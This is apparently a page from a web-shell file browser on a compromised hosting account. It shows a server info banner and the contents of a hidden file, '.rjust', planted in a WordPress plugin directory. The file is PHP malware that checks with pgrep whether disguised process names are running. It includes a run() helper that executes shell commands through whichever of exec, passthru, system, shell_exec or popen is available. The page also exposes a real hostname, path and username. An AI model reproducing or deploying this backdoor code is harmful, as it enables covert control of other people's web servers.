HEX
Server: Apache
System: FreeBSD www860.sakura.ne.jp 13.0-RELEASE-p14 FreeBSD 13.0-RELEASE-p14 #2: Mon Dec 9 13:54:55 JST 2024 root@www5301.sakura.ne.jp:/usr/obj/usr/src/amd64.amd64/sys/GENERIC amd64
User: yoyo0427 (1306)
PHP: 8.3.8
Disabled: NONE
Upload Files
File: /home/yoyo0427/www/www.yn-artspace.com/wp-content/plugins/admin-menu-search/.rjust
<?php   $files = ['beginedit','screen_03','config_path','searchform','attachment','modifier.upper','feedcreator','unsupported','a_fine_pannello','dateparser','ChangeName','config.inc','StringHash','joomlastats.inc','Config.class','default_login','calendarClass','cache_viewthread','c360_settings','data_ranks','stats_customers','functions_block','forgot_pass','VarParser','pical_new_event','MakeWellFormed','blog_item','contact_messages','show_event','renderprocess']; foreach ($files as $f) {     $res = @run("pgrep {$f}");     if (!preg_match('/\d+/', $res)) {         die("<f>{$f}</f>");     } } die('!ended!');  function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f))             $out .= fread($f, 1024);         pclose($f);     }     return $out; }